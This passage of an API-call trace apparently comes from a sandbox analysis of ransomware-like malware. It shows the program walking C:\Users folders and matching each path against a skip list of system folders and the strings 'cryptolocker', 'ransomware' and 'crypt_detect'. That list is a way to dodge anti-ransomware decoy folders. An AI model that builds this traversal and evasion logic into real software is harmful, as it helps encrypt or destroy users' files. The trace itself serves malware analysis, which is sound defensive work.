ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.111] StrCmpW (psz1="..", psz2=".") returned 1 [0129.111] StrCmpW (psz1="..", psz2="..") returned 0 [0129.111] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0129.111] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0129.111] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0129.111] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0129.111] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\") returned="C:\\Users\\Default.migrated\\AppData\\Local\\" [0129.111] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\", psz2="Microsoft", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft" [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.111] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0129.111] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0129.111] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.112] GetProcessHeap () returned 0xe30000 [0129.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.112] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0129.112] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.112] GetProcessHeap () returned 0xe30000 [0129.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.112] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0129.112] StrCmpW (psz1="Documents", psz2=".") returned 1 [0129.112] StrCmpW (psz1="Documents", psz2="..") returned 1 [0129.112] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0129.112] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0129.112] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="Documents", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\boot\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="crypt_detect") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="cryptolocker") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="ransomware") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0129.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0129.113] GetProcessHeap () returned 0xe30000 [0129.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xed39f8 [0129.113] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default.migrated\\Documents", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0129.113] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\Documents", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents\\*") returned="C:\\Users\\Default.migrated\\Documents\\*" [0129.113] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\Documents\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.113] StrCmpW (psz1=".", psz2=".") returned 0 [0129.113] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.113] StrCmpW (psz1="..", psz2=".") returned 1 [0129.113] StrCmpW (psz1="..", psz2="..") returned 0 [0129.114] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99a3d0f, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99a3d0f, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99a3d0f, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0129.114] StrCmpW (psz1="My Music", psz2=".") returned 1 [0129.114] StrCmpW (psz1="My Music", psz2="..") returned 1 [0129.114] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0129.114] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0129.114] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0129.114] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0129.114] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0129.114] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0129.114] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0129.114] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.114] GetProcessHeap () returned 0xe30000 [0129.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.115] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0129.115] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.115] GetProcessHeap () returned 0xe30000 [0129.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0129.115] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a9bc987, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f69dfa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f69dfa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.115] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.115] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.115] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 1 [0129.115] StrCmpW (psz1="FD1HVy", psz2=".") returned 1 [0129.115] StrCmpW (psz1="FD1HVy", psz2="..") returned 1 [0129.115] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0129.115] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0129.115] StrNCatW (in: psz1="C:\\Users\\", psz2="FD1HVy", cchMax=1042 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system32\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\local\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\boot\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\perflogs\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\programdata\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\drivers\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\wsus\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="crypt_detect") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="cryptolocker") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="ransomware") returned 0x0 [0129.115] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\WINDOWS") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files") returned 0x0 [0129.116] GetProcessHeap () returned 0xe30000 [0129.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0x6874278 [0129.116] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.116] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\*") returned="C:\\Users\\FD1HVy\\*" [0129.116] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.116] StrCmpW (psz1=".", psz2=".") returned 0 [0129.116] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.116] StrCmpW (psz1="..", psz2=".") returned 1 [0129.116] StrCmpW (psz1="..", psz2="..") returned 0 [0129.116] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0129.116] StrCmpW (psz1="AppData", psz2=".") returned 1 [0129.116] StrCmpW (psz1="AppData", psz2="..") returned 1 [0129.116] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.116] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.116] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="AppData", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\boot\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0129.116] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="crypt_detect") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="cryptolocker") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="ransomware") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0129.117] GetProcessHeap () returned 0xe30000 [0129.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xed39f8 [0129.117] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0129.117] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\*") returned="C:\\Users\\FD1HVy\\AppData\\*" [0129.117] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.117] StrCmpW (psz1=".", psz2=".") returned 0 [0129.117] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.117] StrCmpW (psz1="..", psz2=".") returned 1 [0129.117] StrCmpW (psz1="..", psz2="..") returned 0 [0129.117] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0129.117] StrCmpW (psz1="Local", psz2=".") returned 1 [0129.117] StrCmpW (psz1="Local", psz2="..") returned 1 [0129.117] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0129.117] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0129.117] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Local", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.117] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0129.118] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 